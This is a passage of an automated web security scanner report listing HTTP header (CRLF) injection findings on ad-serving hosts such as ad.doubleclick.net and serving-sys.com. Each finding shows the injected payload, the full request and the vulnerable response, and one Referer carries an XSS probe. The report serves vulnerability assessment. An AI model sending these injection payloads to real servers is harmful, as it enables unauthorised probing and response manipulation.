
<h1>Error 302 Moved Temporarily</h1>

4.25. http://ad.doubleclick.net/adj/sugar.tres/ros [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/sugar.tres/ros

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 723a8%0d%0a942d40e3e30 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /723a8%0d%0a942d40e3e30/sugar.tres/ros;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=58645 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520c7b9a%22-alert(1)-%226d84b52305d
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/723a8
942d40e3e30
/sugar.tres/ros;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=58645:
Date: Wed, 11 May 2011 16:00:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.26. http://ad.doubleclick.net/adj/trb.zap2it/ntl/community [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/community

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13b9b%0d%0aa33dd0e08de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13b9b%0d%0aa33dd0e08de/trb.zap2it/ntl/community;rs=10011;rs=10030;rs=10070;rs=D08734_70008;rs=D08734_72078;;ptype=sf;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/pop2it/video/;ord=7762411? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/pop2it/video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13b9b
a33dd0e08de
/trb.zap2it/ntl/community;rs=10011;rs=10030;rs=10070;rs=D08734_70008;rs=D08734_72078;;ptype=sf;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http: //www.zap2it.com/pop2it/video/;ord=7762411
Date: Wed, 11 May 2011 15:53:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.27. http://ad.doubleclick.net/adj/trb.zap2it/ntl/hp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/hp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53a1c%0d%0a31193cee46a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53a1c%0d%0a31193cee46a/trb.zap2it/ntl/hp;;ptype=sf;slug=zap-2010homelayout;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/;ord=85014959? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53a1c
31193cee46a
/trb.zap2it/ntl/hp;;ptype=sf;slug=zap-2010homelayout;rg=ur;pos=t;dcopt=ist;sz=1x1;tile=1;u=http: //www.zap2it.com/;ord=85014959
Date: Wed, 11 May 2011 15:52:14 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.28. http://ad.doubleclick.net/adj/trb.zap2it/ntl/video [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/video

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 81f29%0d%0a5d57bed2220 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /81f29%0d%0a5d57bed2220/trb.zap2it/ntl/video;rs=10011;rs=10030;rs=10070;rs=D08734_70008;rs=D08734_70010;rs=D08734_70118;rs=D08734_70613;rs=D08734_72078;;ptype=sf;rg=ur;ref=zap2itcom;pos=t;dcopt=ist;sz=1x1;tile=1;u=http://www.zap2it.com/videobeta/watch/;ord=35233493? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/videobeta/watch/?watch=46b4b96c-d010-456a-8c9a-8848a32e31e3&cat=a2b03c2b-b892-4e41-8a2b-c09f9d4d5ff5&src=front
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/81f29
5d57bed2220
/trb.zap2it/ntl/video;rs=10011;rs=10030;rs=10070;rs=D08734_70008;rs=D08734_70010;rs=D08734_70118;rs=D08734_70613;rs=D08734_72078;;ptype=sf;rg=ur;ref=zap2itcom;pos=t;dcopt=ist;sz=1x1;tile=1;u=http: //www.zap2it.com/videobeta/watch/;ord=35233493
Date: Wed, 11 May 2011 15:58:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.29. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 271d4%0d%0a9b831f6d759 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif271d4%0d%0a9b831f6d759?5066642 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif271d4
9b831f6d759
:
Date: Wed, 11 May 2011 14:58:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.30. http://ad.doubleclick.net/pfadx/starpulse_cim/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/starpulse_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 48478%0d%0a450fe44fd28 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/starpulse_cim/;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;AA=1;AH=1;AJ=1;AR=1;AS=1;ic24=1;ic10=1;ic6=1;sz=24x24;dcmt=text/html;ord=1305125776728?&48478%0d%0a450fe44fd28=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_9_1&protocol=http%3A&network=starpulse
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;239954491;0-0;0;36764365;24/24;41800565/41818352/1;;~aopt=3/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;AA=1;AH=1;AJ=1;AR=1;AS=1;ic24=1;ic10=1;ic6=1;sz=24x24;dcmt=text/html;;48478
450fe44fd28
=1;~cs=t:
Date: Wed, 11 May 2011 15:00:25 GMT
Content-Length: 1361

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;239954491;0-0;0;36764365;24/24;41800565/41818352/1;;~aopt=3/1/22/0;~okv=;secure=false;position=2;ic22=1;ic19=1;i
...[SNIP]...

4.31. http://ad.doubleclick.net/pfadx/starpulse_cim/ [secure parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/starpulse_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 89df4%0d%0abe56f2dec30 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/starpulse_cim/;secure=89df4%0d%0abe56f2dec30 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_9_1&protocol=http%3A&network=starpulse
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 14:59:23 GMT
Expires: Wed, 11 May 2011 14:59:23 GMT
DCLK_imp: v7;x;44306;0-0;0;36764365;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=89df4
be56f2dec30
;~cs=w:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/v;44306;0-0;0;36764365;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

4.32. http://ad.doubleclick.net/pfadx/zap2it_cim/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/zap2it_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 7e5c5%0d%0ad9210606fd2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/zap2it_cim/;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;AA=1;AH=1;AJ=1;AR=1;AS=1;ic24=1;ic10=1;ic6=1;sz=24x24;dcmt=text/html;ord=1305125749062?&7e5c5%0d%0ad9210606fd2=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;239472171;0-0;14;57450681;24/24;42101881/42119668/1;;~aopt=3/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;AA=1;AH=1;AJ=1;AR=1;AS=1;ic24=1;ic10=1;ic6=1;sz=24x24;dcmt=text/html;;7e5c5
d9210606fd2
=1;~cs=d:
Date: Wed, 11 May 2011 14:57:17 GMT
Content-Length: 1153

DoubleClick.onAdLoaded('MediaAlert',{"impression":"http://ad.doubleclick.net/imp;v7;x;239472171;0-0;14;57450681;24/24;42101881/42119668/1;;~aopt=3/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic
...[SNIP]...

4.33. http://ad.doubleclick.net/pfadx/zap2it_cim/ [secure parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/zap2it_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 16dd0%0d%0a6df1ea6af7c was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/zap2it_cim/;secure=16dd0%0d%0a6df1ea6af7c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 14:56:08 GMT
Expires: Wed, 11 May 2011 14:56:08 GMT
DCLK_imp: v7;x;44306;0-0;0;57450681;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=16dd0
6df1ea6af7c
;~cs=x:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b04/0/0/%2a/w;44306;0-0;0;57450681;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

4.34. http://amch.questionmarket.com/adsc/d872313/2/873601/adscout.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d872313/2/873601/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload d33d1%0d%0a58657f7c565 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d872313/2/873601/adscout.php?ord=1305125772 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.tressugar.com/Cannes-Film-Festival-History-16415520
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1; ES=d33d1%0d%0a58657f7c565

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 14:59:57 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Tue, 11-May-2010 14:59:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1_500004862365-3-1_40348193-4-1_42050771-4-1_600001470346-3-1_40506188-17-1_40506183-17-1_40506184-17-1_873601-2-1; expires=Sun, 01-Jul-2012 06:59:57 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=d33d1
58657f7c565
_872313-Lc{(M-0; expires=Sun, 01-Jul-2012 06:59:57 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

4.35. http://bidder.mathtag.com/iframe/notify [exch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload c657c%0d%0a5d8d4c8cc62 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=c657c%0d%0a5d8d4c8cc62&id=5aW95q2jLzEvTWpsRk5ETkVPRVl0TlRKRE5TMDBRemRDTFVJeVJVRXRNREU0TVRRNU5rVTJOamN4L05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDI3ODU5NzE0Nzc4MTQ4OS8xMTUwMDEvMTAwNDcwLzMvUTNBbV9DbnBmUVVnTncyOVZSNGhUbGlXalYwQm8xb2xMWDVWYTJtWVgxby8/YJjpCmEQlxiFoHxAulO7EVkILUo&price=2.6220 HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=6344371306205&tile=6344371306205&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1305034155; ts=1305035634

Response

HTTP/1.1 404 Not found
Date: Wed, 11 May 2011 15:33:57 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - c657c
5d8d4c8cc62

x-mm-host: ewr-bidder-x4
Connection: keep-alive

Request not found

4.36. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 46abe%0d%0a9b358d367e6 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5309511~~0~~~^ebAdDuration~898~0~01020&OptOut=0&ebRandom=0.08333570836111903&flv=46abe%0d%0a9b358d367e6&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966
Origin: http://ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=0feef563-39b8-4300-9699-4c81bf2e4f803I1070; expires=Tue, 09-Aug-2011 11:59:36 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=46abe
9b358d367e6
&RES=128&WMPV=0; expires=Tue, 09-Aug-2011 11: 59:36 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 11 May 2011 15:59:35 GMT
Connection: close
Content-Length: 0


4.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 2f374%0d%0aa48f472db94 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5309511~~0~~~^ebAdDuration~898~0~01020&OptOut=0&ebRandom=0.08333570836111903&flv=10.2154&wmpv=0&res=2f374%0d%0aa48f472db94 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966
Origin: http://ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=a3591fcb-49e0-4f71-9780-53d46227fc2d3I1010; expires=Tue, 09-Aug-2011 11:59:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=2f374
a48f472db94
&WMPV=0; expires=Tue, 09-Aug-2011 11: 59:37 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 11 May 2011 15:59:37 GMT
Connection: close
Content-Length: 0


4.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 41619%0d%0abd382df1bca was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5309511~~0~~~^ebAdDuration~898~0~01020&OptOut=0&ebRandom=0.08333570836111903&flv=10.2154&wmpv=41619%0d%0abd382df1bca&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/sugar.tres/gallery;nid=16415520;sz=728x90;gid=3019466;pos=above;dcopt=ist;tile=1;ord=49966
Origin: http://ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=36ccc5a7-0f3e-433c-9271-dc28e58e2b203I1070; expires=Tue, 09-Aug-2011 11:59:37 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.2154&RES=128&WMPV=41619
bd382df1bca
; expires=Tue, 09-Aug-2011 11: 59:37 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 11 May 2011 15:59:36 GMT
Connection: close
Content-Length: 0


